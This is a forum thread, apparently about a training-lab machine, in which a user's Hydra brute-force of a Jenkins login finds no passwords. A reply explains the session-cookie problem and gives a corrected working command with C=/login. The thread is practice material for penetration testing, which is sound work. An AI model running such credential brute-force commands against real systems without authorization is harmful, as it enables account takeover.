Hydra question

Hello, I need some help with hydra tool. I am trying to bruteforce Jenkins on one of the starter machines.

└─$ hydra -L testuser -P testpass 10.129.8.179 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:Invalid username or password" -s 8080 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-26 15:26:34
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:2/p:6), ~1 try per task
[DATA] attacking http-post-form://10.129.8.179:8080/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:Invalid username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[VERBOSE] Page redirected to http[s]://10.129.8.179:8080/loginError
[STATUS] attack finished for 10.129.8.179 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-26 15:26:38

Hydra keeps telling 0 passwords found despite the fact that the password and username are definitely in the lists (12 records total). I tried :F=/loginError option also and the tool still can’t pick the login\password. What am I doing wrong? Thanks

I was battling the same problem and finally managed to resolve it - maybe even understand it. My theory after tinkering with WireShark:

When you do the login POST-request, you are supposed to provide a cookie containing session id. If the credentials are correct, the backend marks the session id as authorized, and the client is redirected to make a GET request to root page (10.129.8.169:8080/ in your case). When the client makes that GET request with the authorized session id-cookie, the backend finally responds with a redirect to the Jenkins dashboard.

The problem is that Hydra doesn’t know how to get the cookie initially, so even when the POST-request is done with correct credentials, as it’s done without a cookie, no session id gets authorized. In Hydra’s case, when the client is asked to make a new GET request to root, Hydra doesn’t supply any cookie, and you get response 403 Forbidden (authentication required) instead of being redirected to Jenkins dashboard.

To fix this, simply add C=/login to the parameters. C-parameter let’s Hydra know that it first needs to grab the cookie from /login - page, and then it will use the cookie in all further requests. Example:

hydra -l root -p password 10.129.8.179 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=Sign+in:C=/login:Invalid" -s 8080 -v

Specifically, it seems like Hydra gets confused about the 403 status code, because like your console output shows, it is quite easy to spot the successful login even without the cookie.